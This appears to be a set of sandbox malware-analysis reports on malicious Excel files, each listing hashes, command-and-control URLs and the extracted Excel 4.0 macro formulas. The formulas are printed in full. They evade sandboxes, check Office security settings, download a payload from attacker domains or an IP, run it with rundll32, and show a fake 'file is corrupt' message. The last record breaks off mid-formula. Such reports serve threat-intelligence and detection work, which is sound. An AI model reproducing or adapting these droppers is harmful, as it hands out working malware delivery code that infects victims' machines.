{"version":"0.2","sample":{"sample":"","kind":"file","target":"9348fa459d56ab7571c6e16afc1107c45272bb89a05b86a04761ef5bdeb8919a"},"analysis":{"reported":"2020-04-09T16:17:44Z","score":10},"files":[{"filename":"9348fa459d56ab7571c6e16afc1107c45272bb89a05b86a04761ef5bdeb8919a","filesize":221184,"md5":"40ab3e1d119328e4bfa88e572bb57428","sha1":"b59e5de18c894e9379138edc3def3863054fac67","sha256":"9348fa459d56ab7571c6e16afc1107c45272bb89a05b86a04761ef5bdeb8919a","sha512":"f370074cb0ceb95ac9265b1151f15b0d10324cca5233963e64c46fcd2e7684dd52e3af38a6a2123a29ef3e9e6bb569483ac9ddf52a1d536a564ffcbb43f48e40","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9348fa459d56ab7571c6e16afc1107c45272bb89a05b86a04761ef5bdeb8919a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qfgMfrQWDD\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"936603064110f69c157fd80bf896b827b5af68ddd5a06198d0adadad3cda44fa"},"analysis":{"reported":"2020-04-09T16:17:44Z","score":10},"files":[{"filename":"936603064110f69c157fd80bf896b827b5af68ddd5a06198d0adadad3cda44fa","filesize":206336,"md5":"50c72b172edcfebca67f53a758b89618","sha1":"cdbe32617e11aa32bc7ee5e8195cc5021a7027cc","sha256":"936603064110f69c157fd80bf896b827b5af68ddd5a06198d0adadad3cda44fa","sha512":"ef83f97c6cf38c48c5fd6288b88e796525347f1e87e6c82fcfb4e10ba46977c97b2d9990b81e2c12d64a1f205a70712ed6953d0130f9c892ed1107fb998badb6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"936603064110f69c157fd80bf896b827b5af68ddd5a06198d0adadad3cda44fa.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"WDuACVNzFa\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9369e6ccfc5cd30a44d2f967fe77b796ba6a89f6bc6afd1cf0f17c43222a8bee"},"analysis":{"reported":"2020-04-09T16:17:44Z","score":10},"files":[{"filename":"9369e6ccfc5cd30a44d2f967fe77b796ba6a89f6bc6afd1cf0f17c43222a8bee","filesize":168960,"md5":"52885bd1a8252a84ebfb5b2ae1c24025","sha1":"5b6cede7c749150351b59dbaaca219919ff5e0a6","sha256":"9369e6ccfc5cd30a44d2f967fe77b796ba6a89f6bc6afd1cf0f17c43222a8bee","sha512":"2aa79799d89fe50eb39036d1272bbd5af9fc01dd8940fa6e1c6952371c6b748ffea1545abf53a8f9136873cea6bbcc6822386b9e12ae7bf147af4e81ba3edf13","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9369e6ccfc5cd30a44d2f967fe77b796ba6a89f6bc6afd1cf0f17c43222a8bee.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"UtzdiOoG7G\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"93880ac9560ae49cdc5e06dad7a0352170c373004dabd58b9a23e215ad5bb762"},"analysis":{"reported":"2020-04-09T16:17:45Z","score":10},"files":[{"filename":"93880ac9560ae49cdc5e06dad7a0352170c373004dabd58b9a23e215ad5bb762","filesize":185344,"md5":"0e18a4020a65f34a68dd3f664a565b54","sha1":"1cf54cb5ac608ebc2d3071438c52f8f82c96fd8b","sha256":"93880ac9560ae49cdc5e06dad7a0352170c373004dabd58b9a23e215ad5bb762","sha512":"fed48f5e999f9d1a3469393450aa7ebda419c7f5370d5750c470c82faa5b4180cebb420c03bba1d96a27c93d1aafee476b058db59b6c201b3bcce84d4cc73a0a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"93880ac9560ae49cdc5e06dad7a0352170c373004dabd58b9a23e215ad5bb762.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"938c745988f670ad664a4445ce14d033d15a0cacdfcdf7d5dc7810aa73afbc41"},"analysis":{"reported":"2020-04-09T16:17:45Z","score":10},"files":[{"filename":"938c745988f670ad664a4445ce14d033d15a0cacdfcdf7d5dc7810aa73afbc41","filesize":116224,"md5":"9505dd99362bbc7cbc9feb05867ff385","sha1":"8715330498d18b8ac30b9dba022b3c569393fceb","sha256":"938c745988f670ad664a4445ce14d033d15a0cacdfcdf7d5dc7810aa73afbc41","sha512":"d0be7b2df7b44171199bed25e34dcb00c508a10be7e8721e30977ace76dcc5eab2d100f77d26d8c44abe88ea774ed9a87a45ece87af8c8d58587ffe03e3f420f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"938c745988f670ad664a4445ce14d033d15a0cacdfcdf7d5dc7810aa73afbc41.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"RNwus3vFDh\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"938d03686d46b62aba6863692784142d52aad2abca17ed992b42d4000493d6b6"},"analysis":{"reported":"2020-04-09T16:17:45Z","score":10},"files":[{"filename":"938d03686d46b62aba6863692784142d52aad2abca17ed992b42d4000493d6b6","filesize":103941,"md5":"50f93a0edc0c2a59f963724eb409a59c","sha1":"d6172b13636e0ec9edf2bde235cfb983159c88b9","sha256":"938d03686d46b62aba6863692784142d52aad2abca17ed992b42d4000493d6b6","sha512":"ebbd47c4eb1b225e1302c555b8ad7f60a57e96de80972dc627298cecf05d945391c9e68ff7e3904783bdcfea1d8683e554ba4d21a2f3705b261f79a24cb71fdc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"938d03686d46b62aba6863692784142d52aad2abca17ed992b42d4000493d6b6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://209.141.54.161/crypt.dl"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\\CkkYKlI\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://209.141.54.161/crypt.dl\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"rundll32.exe\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll DllRegisterServer\",0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"939939186ee955716f9514bd96bcb4d908fa542547a3dd8741bd2cdc049d1b58"},"analysis":{"reported":"2020-04-09T16:17:45Z","score":10},"files":[{"filename":"939939186ee955716f9514bd96bcb4d908fa542547a3dd8741bd2cdc049d1b58","filesize":185344,"md5":"627a9e95c61942f097382d4009fd2dff","sha1":"6b345e5692f59ed686b468d63bae66b0fac89fd6","sha256":"939939186ee955716f9514bd96bcb4d908fa542547a3dd8741bd2cdc049d1b58","sha512":"d1b66b7029d10a8cbbcaaa0bf32dc8b37a5d32f3f0a47f7e26bd107390fb8ad067a098dc64c8ba5be29db8f2cbf7469161f64070945d07fb3807addaaa2005fb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"939939186ee955716f9514bd96bcb4d908fa542547a3dd8741bd2cdc049d1b58.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"939ebf7c7bfd1af145a9a9a8c6a794123853e452f83284a1bb93afbdaf49edd7"},"analysis":{"reported":"2020-04-09T16:17:45Z","score":10},"files":[{"filename":"939ebf7c7bfd1af145a9a9a8c6a794123853e452f83284a1bb93afbdaf49edd7","filesize":116224,"md5":"a70d6566cf604cd9ebd6d0cd39edb3d7","sha1":"7876838a55906df2a2f12ea45539dbe5df202a2f","sha256":"939ebf7c7bfd1af145a9a9a8c6a794123853e452f83284a1bb93afbdaf49edd7","sha512":"41843a1cc33ef66707c69fa4ef310aa5768ff45694997bb5ab60f7b49036b66283359cf7972b80c4b2e285c99d68c7edb78f37af34258f9e34fa13840593b583","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"939ebf7c7bfd1af145a9a9a8c6a794123853e452f83284a1bb93afbdaf49edd7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"SxsvfW0EDU\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"93a80170f977ab0946b80ec80c9343ca8df8512ec3c5b26d2e0401a180415132"},"analysis":{"reported":"2020-04-09T16:17:45Z","score":10},"files":[{"filename":"93a80170f977ab0946b80ec80c9343ca8df8512ec3c5b26d2e0401a180415132","filesize":221184,"md5":"431ffb6f64bbe8846445ed6151a9214c","sha1":"78c888325e0d812adaff552d4f51fa48a10eabd2","sha256":"93a80170f977ab0946b80ec80c9343ca8df8512ec3c5b26d2e0401a180415132","sha512":"d2b2fab29b562f6738e50fb8802c06efabdad2cbe4edb2bed2a45a2711f01a2abf1a11dd9ad637008ed23a32d08d72d99ed857a1cb0ccc5cb34dce7aa718d597","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"93a80170f977ab0946b80ec80c9343ca8df8512ec3c5b26d2e0401a180415132.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Yh1xN90xQz\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"93aefe450804997512a8a63ed1a6bfda61e27786bcf965d9d9853d9b2279b615"},"analysis":{"reported":"2020-04-09T16:17:45Z","score":10},"files":[{"filename":"93aefe450804997512a8a63ed1a6bfda61e27786bcf965d9d9853d9b2279b615","filesize":185344,"md5":"071b96983ae4f476d0331956a3f510f4","sha1":"5d492b595a0e4112b9b90c6e89d13b081309b14e","sha256":"93aefe450804997512a8a63ed1a6bfda61e27786bcf965d9d9853d9b2279b615","sha512":"746c5a15ee2ecc8608bd6dfb0ef23f6c126f780a5bb2cc7d350d03ba4620b0e76b37a4198a3209c0e2964920d3e399653d7829e88cd92d0f026105d6982cfc81","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"93aefe450804997512a8a63ed1a6bfda61e27786bcf965d9d9853d9b2279b615.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"93b730ded06358a457319e0a200678aed61f8d2df6f7204b902508538d254954"},"analysis":{"reported":"2020-04-09T16:17:45Z","score":10},"files":[{"filename":"93b730ded06358a457319e0a200678aed61f8d2df6f7204b902508538d254954","filesize":185344,"md5":"19501431851a3aaafd803f851637adec","sha1":"ae0a2591fb93b68a5a27aa39ada2230f0745d325","sha256":"93b730ded06358a457319e0a200678aed61f8d2df6f7204b902508538d254954","sha512":"207acdc99436cbfa55f1abc8777b21d3b29b7e2b9cc9735b85daf0019cae8f73d0fae37fd40ad85758a1665a0b8f5d1d9a9f7a66136745320745b607e8c62d5a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"93b730ded06358a457319e0a200678aed61f8d2df6f7204b902508538d254954.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"93bc4fc064da5bb39cfbd0416b91ac7a51d0016b5ea1ecba36b3d26841183c10"},"analysis":{"reported":"2020-04-09T16:17:45Z","score":10},"files":[{"filename":"93bc4fc064da5bb39cfbd0416b91ac7a51d0016b5ea1ecba36b3d26841183c10","filesize":152576,"md5":"7c20e6be9813a16fecfddf0ea0f28921","sha1":"d3815b3928f9f97896170ff6b040be7cf70bc3c5","sha256":"93bc4fc064da5bb39cfbd0416b91ac7a51d0016b5ea1ecba36b3d26841183c10","sha512":"53bb25471a07794bfd87ecd3ed37cc7ae9866e46e2a14cfd71ff2b8e4120a97fdb63db04bf0143ba5b5072e8da88fb0f5c200a11dbd2da4c890985219781d00d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"93bc4fc064da5bb39cfbd0416b91ac7a51d0016b5ea1ecba36b3d26841183c10.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"0l8ZBOetvF\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"93eb1a8802bcf1fd11f80e5e2a7c683c1380deb48d5b5cd7fac203f78c8bd293"},"analysis":{"reported":"2020-04-09T16:17:46Z","score":10},"files":[{"filename":"93eb1a8802bcf1fd11f80e5e2a7c683c1380deb48d5b5cd7fac203f78c8bd293","filesize":167936,"md5":"b0ae48ee6e7ce46aab9f8e264e15aff9","sha1":"97071e10a5ebb8c8cbaa5b7094073169fee97066","sha256":"93eb1a8802bcf1fd11f80e5e2a7c683c1380deb48d5b5cd7fac203f78c8bd293","sha512":"141ab8baa4c33840bed533d11e65b462b7b30f22f98058342cff0db90e545fa5c3423e7f068e0175e0edfa73cf308d48377759092ee2e8180717f45458400baa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"93eb1a8802bcf1fd11f80e5e2a7c683c1380deb48d5b5cd7fac203f78c8bd293.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"pIYa6F5BVI\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"94093705a3887c2f31fa864dc49a1a316a974fd037efe0ab352d703f9726ffbb"},"analysis":{"reported":"2020-04-09T16:17:46Z","score":10},"files":[{"filename":"94093705a3887c2f31fa864dc49a1a316a974fd037efe0ab352d703f9726ffbb","filesize":185344,"md5":"cbbb1ecfce00c77cf18150fb0939c362","sha1":"289b7dd5a7be8195c44e710ed7290673273a86dc","sha256":"94093705a3887c2f31fa864dc49a1a316a974fd037efe0ab352d703f9726ffbb","sha512":"dd159ab8caa9d3be47acd3f5bd4130c9230b26bf40bec02347fb523a97406c7d947bf86a9daafdfb29cfb7cb5bd30147d6139399b2a290bcf5be92dfb96962a1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"94093705a3887c2f31fa864dc49a1a316a974fd037efe0ab352d703f9726ffbb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"941023ebcbbc8d30db625106c1baec4c5af9174b76abe5b9112af103e15d05c0"},"analysis":{"reported":"2020-04-09T16:17:46Z","score":10},"files":[{"filename":"941023ebcbbc8d30db625106c1baec4c5af9174b76abe5b9112af103e15d05c0","filesize":170496,"md5":"0f88d3e533d9de616cfa94c57c8cf04e","sha1":"4f0e14606108c43d95bccb992acfb261f5f5c11b","sha256":"941023ebcbbc8d30db625106c1baec4c5af9174b76abe5b9112af103e15d05c0","sha512":"2ee380b83ca334c4e37209a8bf2ffb1db5cfa1865bbb91149b5b245e5d85656ad5b918d6f75fe85b70ba9e6575a14f617d680a266c172411800a010c9d0cc54f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"941023ebcbbc8d30db625106c1baec4c5af9174b76abe5b9112af103e15d05c0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"k9Qau0Bo5c\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"942b92bb4d0ed8cf71a57a8487cc18b9b9a75a0542048da7139c3130b6c899a8"},"analysis":{"reported":"2020-04-09T16:17:46Z","score":10},"files":[{"filename":"942b92bb4d0ed8cf71a57a8487cc18b9b9a75a0542048da7139c3130b6c899a8","filesize":160768,"md5":"43390dccc91d92aa9ab7d6af48688db3","sha1":"5031ea2d6190d8cb499d678b9fbda761a2760d20","sha256":"942b92bb4d0ed8cf71a57a8487cc18b9b9a75a0542048da7139c3130b6c899a8","sha512":"128612d97b0d67fdb0a261147def00514c3dd26b0cbbfd911b593ebd3b27eab90bfd9a5decc7b634b59f69aa25bfb75fb1969c6cce4878edea1a3d00c3374338","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"942b92bb4d0ed8cf71a57a8487cc18b9b9a75a0542048da7139c3130b6c899a8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's 